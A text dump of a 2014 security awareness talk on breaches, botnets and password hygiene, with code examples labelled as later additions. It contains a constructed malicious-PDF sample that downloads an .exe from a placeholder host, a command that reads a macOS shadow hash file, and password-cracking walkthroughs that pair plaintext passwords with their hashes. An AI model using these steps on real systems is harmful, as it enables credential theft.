1. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 1/33
How Safe is Your Data?
TAPPS
12 May 2014
Michael Soltys
McMaster University / Executek
2. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#8 2/33
Information Security
Key in a knowledge-based economy; key to safety: at a personal,
organizational, and national level
As technology evolves, so do the threats
User behavior:
- choose good passwords
- update software regularly
- authenticate
Advanced practice:
- comes down to the unsolved problem of writing correct software
- Big data analytics
3. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#8 3/33
Large scale attacks: U of Maryland
Attacks can affect large numbers of people
In February 2014 the University of Maryland faced what it called a
"sophisticated cyber-attack"
which breached the records of more than 287,000 present and past students
4. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 4/33
Large scale vulnerabilities: Heartbleed Bug
allows an attacker to read the memory of a web server
affects all versions of OpenSSL in the 1.0.1 series up to and including 1.0.1f
the defect could be used to reveal up to 64 kilobytes of the application's memory
CVE-2014-0160
Canadian Revenue Agency (CRA) closed down its electronic services website over
Heartbleed bug security concerns
OpenSSL validated under FIPS 140-2 by NIST!
(FIPS = Federal Information Processing Standards; NIST = National Institute of Standards
and Technology)
5. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 5/33
New types of attacks
The field is not static; new attacks are clever and inventive:
Drive-by downloads: a browsing reader can accidentally download rogue computer
programs.
Spear phishing: specific individuals or organisations are targeted with fake
emails to obtain confidential information.
Watering hole: about one in 20 attacks uses this strategy. Rather than trying to
break into an organisation's network directly, the attacker compromises other
websites that the organisation's people regularly visit, with the aim of infecting
their computers so that the unwitting carrier brings the malware back into their
own network.
6. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 6/33
A typical attack: Malicious PDFs
In March 2014 a massive scam email was sent in Colombia, claiming to be from one of
the country's credit score agencies.
The email contained an attachment. The file does not show a malicious payload when
scanned by antimalware software.
However, doing a "stream dump" of the file we see:
Malicious scripting, which instructs the reader to open a URL. After downloading
the file at that URL, a keylogger is installed.
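The "stream dump" the slide describes, as an added example in Python (not the talk's or ISC's code): it inflates FlateDecode streams, undoes #xx name escaping, counts action-related names, and pulls URLs out of the dumped stream text. The sample PDF is constructed here and its URL is a placeholder.

```python
import re
import zlib

# Action-related PDF names worth flagging in a file that claims to be a
# credit report; the talk's sample hid a script that fetched a URL.
SUSPICIOUS = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/URI")
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)endstream", re.S)
NAME_ESC_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
URL_RE = re.compile(rb"https?://[^\s\"'()<>]+")


def normalise_names(data: bytes) -> bytes:
    """Undo #xx escapes so an obfuscated /J#61vaScript reads /JavaScript."""
    return NAME_ESC_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def dump_streams(data: bytes):
    """Yield each stream body, inflated when it is FlateDecode; bodies that
    zlib rejects (uncompressed or otherwise encoded) are yielded raw."""
    for m in STREAM_RE.finditer(data):
        try:  # decompressobj tolerates the line ending before 'endstream'
            yield zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            yield m.group(1)


def scan_pdf(data: bytes) -> dict:
    """Count suspicious names in the object dictionaries and in the dumped
    streams, and collect every URL that appears inside stream contents."""
    dicts = normalise_names(STREAM_RE.sub(b"", data))
    streams = [normalise_names(s) for s in dump_streams(data)]
    names = {}
    for view in [dicts] + streams:
        for name in SUSPICIOUS:
            # a PDF name ends at a delimiter, so /JS must not match /JSX
            n = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", view))
            if n:
                names[name.decode()] = names.get(name.decode(), 0) + n
    urls = [u.decode("latin-1") for s in streams for u in URL_RE.findall(s)]
    return {"names": names, "urls": urls}


def build_sample_pdf() -> bytes:
    """Constructed test file (not the Colombian sample from the talk): the
    script sits in a compressed stream and its action name is escaped as
    /J#61vaScript, so a plain grep for /JavaScript finds nothing."""
    js = b'app.launchURL("http://example.invalid/reporte.exe", true);'
    comp = zlib.compress(js)
    objs = [
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj",
        b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj",
        b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj",
        b"4 0 obj << /S /J#61vaScript /JS 5 0 R >> endobj",
        b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(comp)
        + comp + b"\nendstream\nendobj",
    ]
    return b"%PDF-1.4\n" + b"\n".join(objs) + b"\n%%EOF\n"
```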
7. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 7/33
2011: A Bad Year
When the history of 2011 is written, it may well be remembered as the Year of the Hack.
Stories of computer breaches were breaking almost every week:
Sony
Fox
the British National Health Service
and the Web sites of:
PBS
the U.S. Senate
and the C.I.A.
all fell victim to highly publicized cyber-attacks. Many of the breaches have been
attributed to the groups Anonymous and LulzSec.
8. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 8/33
Operation Shady Rat
Operation Shady rat ranks with Operation Aurora (the attack on Google and many
other companies in 2010) as among the most significant and potentially damaging
acts of cyber-espionage yet made public.
Operation Shady rat has been stealing valuable intellectual property (including
government secrets, email archives, legal contracts, negotiation plans for
business activities, and design schematics) from more than 70 public and
private sector organizations in 14 countries.
The list of victims, which ranges from national governments to global
corporations to tiny nonprofits, demonstrates with unprecedented clarity the
universal scope of cyber-espionage and the vulnerability of organizations in
almost every category imaginable.
9. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 9/33
Operation Shady Rat
The vast majority of victims, 49, were U.S. based companies, government
agencies, and nonprofits. The category most heavily targeted was defense
contractors, 13 in all.
All the signs point to China.
Forensic investigation revealed that the defense contractor had been hit by a
species of malware that had never been seen before: a spear-phishing email
containing a link to a Web page that, when clicked, automatically loaded a
malicious program, a remote access tool, or rat, onto the victim's computer.
The rat opened the door for a live intruder to get on the network, escalate
user privileges, and begin exfiltrating data.
10. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 10/33
Victims don't want to be victims
McAfee sent emails to officials at four organizations, informing them that
their computer networks had been compromised.
Three of those organizations, including one whose breach is ongoing, made no
response to McAfee's notifications.
"Victims don't want to know they're victims. I guess that's just victim
psychology: if you don't know about it, it's not really happening."
bit.ly/1iiKWoh(http://bit.ly/1iiKWoh)
CNN - Operation Shady RAT
11. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 11/33
An innocuous click
RSA is the security division of the high-tech company EMC. Its products protect
computer networks at the
White House
the Central Intelligence Agency
the National Security Agency
the Pentagon
the Department of Homeland Security,
as well as most top defense contractors, and a majority of Fortune 500
corporations.
12. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 12/33
An innocuous click
Sometime in the winter of 2011, lying there in the junk-mail folder, in the
spammy mess of mortgage offers and erectile-dysfunction drug ads, an email from
an associate with a subject line that looked legit caught the man's eye.
The subject line said "2011 Recruitment Plan."
The man clicked on the message, downloaded the attached Excel spreadsheet file,
and unwittingly set in motion a chain of events allowing hackers to raid the
computer networks of his employer, RSA.
The parent company disclosed the breach on March 17, 2011, in a filing with the
Securities and Exchange Commission. The hack gravely undermined the reputation
of RSA's popular SecurID security service.
13. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 13/33
An innocuous click
Experts found evidence that the attack on RSA had come from China.
They also linked the RSA attack to the penetration of computer networks at some
of RSA's most powerful defense-contractor clients, among them:
Lockheed Martin, Northrop Grumman, L-3 Communications
Few details of these episodes have been made public.
BIG DATA →
bit.ly/1iiLc6I(http://bit.ly/1iiLc6I)
14. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 14/33
Operation Aurora
In 2010 Google became the first major company to blow the whistle on Chinese
hacking when it admitted to a penetration known as Operation Aurora, which also
hit:
Intel
Morgan Stanley
and several dozen other corporations
Most companies have preferred not to talk about or even acknowledge violations
of their computer systems, for fear of panicking shareholders and exposing
themselves to lawsuits.
Or for fear of offending the Chinese and jeopardizing their share of that
country's exploding markets.
15. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 15/33
Operation Aurora
Chinese hackers who breached Google's servers several years ago gained access to
a sensitive database with years' worth of information about U.S. surveillance
targets, according to current and former government officials.
bit.ly/1iiLtXt(http://bit.ly/1iiLtXt)
The breach appears to have been aimed at unearthing the identities of Chinese
16. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 16/33
Attempted logins
17. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 17/33
Attempted logins
#!/usr/bin/perl
# Annotate each host seen in attempted logins with its IP address (dig)
# and country (geoiplookup); the output is an HTML fragment.
use strict;
use warnings;

my $i = 1;
my $test = 0;
my $packets = 0;

# Resolve a hostname with dig and print its first address (or "?").
sub compute_ip {
    my ($host) = @_;
    my ($IP) = split /\n/, `dig $host +short`;
    print $IP ? "\t\t IP= $IP <br>\n" : "\t\t IP= ? <br>\n";
}

# Look up the country with geoiplookup (Fink path as in the original);
# the regex keeps the country name that ends its output line.
sub compute_location {
    my ($host) = @_;
    my $country = `/sw/bin/geoiplookup $host`;
    chomp $country;
    my ($country_short) = $country =~ m/([ A-Za-z]*)$/;
    print $country_short ? "\t\t Country= $country_short <br>\n\n"
                         : "\t\t Country= ? <br>\n\n";
}

# The rest of the script is cut off on the slide. This driver (added here)
# runs both lookups for each host named on the command line, rejecting
# anything that is not a plain hostname so that a crafted log entry cannot
# smuggle shell metacharacters into the backtick commands above.
for my $host (@ARGV) {
    next unless $host =~ /^[\w.-]+$/;
    print "$host <br>\n";
    compute_ip($host);
    compute_location($host);
}
18. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 18/33
Estonia 2007
In the Spring of 2007, government computer systems in Estonia experienced a
sustained cyberattack (cyber-{warfare, terror, crime}).
On April 27, officials in Estonia moved a Soviet-era war memorial commemorating
an unknown Russian who died fighting the Nazis. The move stirred emotions, and
led to rioting by ethnic Russians, and the blockading of the Estonian Embassy
in Moscow.
19. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 19/33
Estonia 2007
The event marked the beginning of a series of large and sustained Distributed
Denial-of-Service (DDoS) attacks launched against several Estonian national websites.
In the early days of the cyberattack, government websites that normally receive around
1,000 visits a day reportedly were receiving 2,000 visits every second. This caused the
repeated shutdown of some websites.
The cyberattacks against Estonia were unusual because the rate of the packet attack was
very high, and the series of attacks lasted weeks, rather than the hours or days more
commonly seen for a DoS attack.
Eventually, NATO and the United States sent computer security experts to
Estonia to help recover from the attacks, and to analyze the methods used and
attempt to determine the source of the attacks.
youtu.be/PTv3QrhGPC8?t=42m34s(http://youtu.be/PTv3QrhGPC8?t=42m34s)
20. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 20/33
Estonia 2007
A persistent problem during and after any cyberattack is accurate
identification of the attacker:
was it sponsored by a nation?
was it the independent work of a few unconnected individuals?
was it initiated by a group to instill frustration and fear by damaging the
computerized infrastructure and economy?
The uncertainty of not knowing the initiator also affects the decision about
who should ultimately become a target for retaliation, and whether the
response should come from law enforcement or the military.
After some investigation, network analysts later concluded that the
cyberattacks targeting Estonia were not a concerted attack, but instead were
the product of spontaneous anger from a loose federation of separate attackers.
21. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 21/33
Botnets
Botnet = "Robot Network"
Botnets are made up of vast numbers of compromised computers that have been
infected with malicious code and can be remotely controlled through commands sent
via the Internet.
Hundreds or thousands of these infected computers can operate in concert to:
disrupt or block Internet traffic for targeted victims
harvest information
distribute spam, viruses, or other malicious code.
22. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 22/33
Botnets
Botmasters can reportedly make large sums of money by marketing their technical
services.
For example, Jeanson Ancheta, a 21-year-old hacker and member of a group called the
Botmaster Underground, reportedly made more than $100,000 from different Internet
Advertising companies who paid him to download specially-designed malicious adware
code onto more than 400,000 vulnerable PCs he had secretly infected and taken over.
He also made tens of thousands more dollars renting his 400,000-unit botnet herd to
other companies that used them to send out spam, viruses, and other malicious code
on the Internet.
PPI: Pay-per-Install - The Commoditization of Malware Distribution
In 2006, Ancheta was sentenced to five years in prison (FBI operation Bot Roast).
Symantec reported that it detected 6 million bot-infected computers in the second half
of 2006.
23. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 23/33
Botnets
Some botnet owners reportedly rent their huge networks for US$200 to $300 an
hour, and botnets are becoming the weapon of choice for fraud and extortion.
Newer methods are evolving for distributing bot software that may make it
even more difficult in the future for law enforcement to identify and locate
the originating botmaster.
Botnets organize themselves in a hierarchical manner, with a central command
and control location (sometimes dynamic) for the botmaster.
This central command location is useful to security professionals because it
offers a possible central point of failure for the botnet.
However, in the near future, attackers may use new botnet architectures that
are more sophisticated, and more difficult to detect and trace, e.g., P2P.
24. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 24/33
E.g., WordPress
A fantastic piece of software for blogging, but it consists of many parts:
MySQL; Apache; PHP; HTML; JavaScript; Mac OS X Server
It is absolutely essential to have the latest versions and a strong password.
25. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 25/33
Passwords
Your password must be a minimum of 8 characters in length and must include
characters from at least three of the four groups below:
Uppercase letters: A, B, C, ... ,Z
Lowercase letters: a, b, c, ...,z
Numerals: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9
Symbols: ~ ! @ # $ % ^ & * ( ) _ + ` - = { } | ] [ : " ; < > ? , . / '
Do not use any of your last five previous passwords.
Passwords cannot contain your account name or parts of your full name.
Generate with a seed, a name, and an MD5 hash generator.
E.g., for myname@gmail.com use seed 5a63y@h& to obtain:
hash: ae19e19070a052b85306fc758146ef8e
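An added Python example (not the talk's) that checks a candidate against the rules listed above and applies the slide's MD5 recipe; what counts as a "part of your full name", how the account name is taken from an address, and the seed+name order are my assumptions. Running the slide's own hash through the checker shows that a hex digest only ever draws on two of the four groups.

```python
import hashlib
import string

# The four groups named in the policy; the symbol set is the one listed.
GROUPS = {
    "uppercase": set(string.ascii_uppercase),
    "lowercase": set(string.ascii_lowercase),
    "numerals": set(string.digits),
    "symbols": set("~!@#$%^&*()_+`-={}|][:\";<>?,./'"),
}


def check_policy(password, account_name, full_name="", previous=()):
    """Return the list of violated rules (an empty list means accepted).

    Assumptions not spelled out on the slide: the account name is the part
    before any '@', a 'part of your full name' is any whitespace-separated
    piece of three or more characters, and matching is case-insensitive.
    `previous` holds earlier passwords in plaintext only for illustration;
    a real system would compare against stored hashes."""
    problems = []
    if len(password) < 8:
        problems.append("fewer than 8 characters")
    used = [g for g, chars in GROUPS.items() if any(c in chars for c in password)]
    if len(used) < 3:
        problems.append(f"only {len(used)} of 4 character groups ({', '.join(used)})")
    if password in list(previous)[-5:]:
        problems.append("reuses one of the last five passwords")
    low = password.lower()
    account = account_name.split("@", 1)[0].lower()
    if account and account in low:
        problems.append("contains the account name")
    for part in full_name.split():
        if len(part) >= 3 and part.lower() in low:
            problems.append(f"contains part of the full name ({part})")
    return problems


def seed_password(seed, name):
    """The slide's recipe: MD5 over a seed and a name. The order of the two
    inputs is not stated there; seed + name is assumed here. A hex digest
    uses only lowercase letters and numerals, so whatever the inputs, the
    result fails the three-of-four-groups rule as written."""
    return hashlib.md5((seed + name).encode()).hexdigest()
```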
26. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 26/33
Uncovered during Executek audits
On a client's computer we discovered that the data was kept in a Dropbox folder,
and someone who was not supposed to see it had constant access to the latest
version.
Most clients use dictionary passwords and never change them; sometimes they write
them down on sticky notes placed on the monitor. Employees who leave keep
passwords, which are not changed immediately, etc.
Software is seldom updated.
The server is secured but the backup module is not.
27. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 27/33
Sophisticated attacks
Control hijacking attacks: exploits and defenses
Dealing with legacy code: sandboxing and isolation
Exploitation techniques and fuzzing
Tools for writing robust application code
Principle of least privilege, access control, and operating systems security
Security problems in network protocols: TCP, DNS, SMTP, and routing
Unwanted traffic: denial of service attacks
28. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 28/33
Authentication
29. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 29/33
Apache Security
Apache HTTP server access:
.htaccess
.htpasswd
The first file is the policy and the second the password:
AuthType Basic
AuthName "Networks & Security Readings 2014"
AuthUserFile cs3c03-w14/ReadingList/.htpasswd
require valid-user
The second file contains the username and a hash of the password; two examples:
nets2014:9bn3EF/hJS5J6
netsec2013:$apr1$fr2JPfTa$HEzejdyg5DE2MFGVCIzd21
30. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 30/33
Apache Security Challenge
I tell my students that the first to break the first password, obtained with
the command:
htpasswd -cbd ./.htpasswd nets2014 a5e1c054
gets extra marks. Note the password is not a dictionary word.
Still, it takes about 15 min with, for example,
oclHashcat-plus
software. On the other hand, breaking the second password, obtained with the
command:
htpasswd -cbm ./.htpasswd netsec2013 tigerblood
is practically impossible (crypt vs. MD5).
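The two schemes behind the .htpasswd entries above, as an added Python example (not the course's own code): Apache's $apr1$ MD5 scheme, which salts and runs 1000 MD5 rounds and is why the second password resists cracking, with a verifier, plus an audit that flags the 13-character DES-crypt form, which truncates passwords at 8 characters and has no stretching. The scheme labels are mine; the two entries are those on the slide.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    """crypt(3)-style base64: least significant 6 bits first."""
    return "".join(ITOA64[(value >> (6 * k)) & 0x3F] for k in range(count))


def apr1_crypt(password: str, salt: str) -> str:
    """Apache's $apr1$ scheme (htpasswd -m): md5crypt with the magic "$apr1$",
    an up-to-8-character salt and 1000 rounds, so each guess costs ~1000 MD5s."""
    pw, salt = password.encode(), salt[:8]
    s = salt.encode()
    ctx = hashlib.md5(pw + b"$apr1$" + s)
    alt = hashlib.md5(pw + s + pw).digest()
    for n in range(len(pw), 0, -16):            # len(pw) bytes of alt
        ctx.update(alt[:min(16, n)])
    n = len(pw)
    while n:                                    # one byte per bit of len(pw)
        ctx.update(b"\0" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for r in range(1000):                       # the stretching loop
        c = hashlib.md5(pw if r & 1 else final)
        if r % 3:
            c.update(s)
        if r % 7:
            c.update(pw)
        c.update(final if r & 1 else pw)
        final = c.digest()
    idx = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                  for a, b, c in idx) + _to64(final[11], 2)
    return f"$apr1${salt}${out}"


def verify_apr1(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    return hmac.compare_digest(apr1_crypt(password, stored.split("$")[2]), stored)


def scheme(h: str) -> str:
    """Label a .htpasswd hash; 13 characters means legacy DES crypt, which
    truncates at 8 characters and has no stretching, so it should be rehashed."""
    if h.startswith("$apr1$"):
        return "apr1-md5"
    return "des-crypt (weak)" if len(h) == 13 else "unknown"


def audit_htpasswd(text: str) -> dict:
    """Map each user in a .htpasswd file to the scheme protecting it."""
    return {user: scheme(h) for user, _, h in
            (line.partition(":") for line in text.splitlines() if ":" in line)}


# The two entries shown on the slide.
HTPASSWD = "nets2014:9bn3EF/hJS5J6\nnetsec2013:$apr1$fr2JPfTa$HEzejdyg5DE2MFGVCIzd21\n"
```

verify_apr1("tigerblood", ...) against the slide's netsec2013 entry lets you check the second hash directly.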
31. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 31/33
Executek: Breaking into a Super-User account
Obtained the SHA1 hash of the password from the "shadow file":
cat /private/var/db/shadow/hash/[...] | cut -c 169-216
which turns out to be:
[...]:4AC8F24F7CE9DBF6C81ECEAA9885401E3221147179FB9178
and then used:
John the Ripper 1.7.3.1
software to reverse engineer the password: onegod
It took about 20 minutes
because the password was a dictionary word!
32. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 32/33
References
CRS Report for Congress 2008(http://www.fas.org/sgp/crs/terror/RL32114.pdf)
Vanity Fair: Operation Shady Rat 2011(http://rdd.me/5sihotjz)
Vanity Fair: Enter the Cyber-Dragon 2011(http://rdd.me/todxjx9k)
Malicious PDF (ISC)(https://isc.sans.edu/forums/diary/17875)
Networks Course Password Cracking Challenge(http://bit.ly/1paMuDy)
33. 5/12/2014 How Safe is Your Data?
http://127.0.0.1:3999/security-may2014.slide#1 33/33
Thank you
Michael Soltys
McMaster University / Executek
soltys@mcmaster.ca(mailto:soltys@mcmaster.ca)
http://www.cas.mcmaster.ca/~soltys(http://www.cas.mcmaster.ca/~soltys)
@MichaelMSoltys(http://twitter.com/MichaelMSoltys)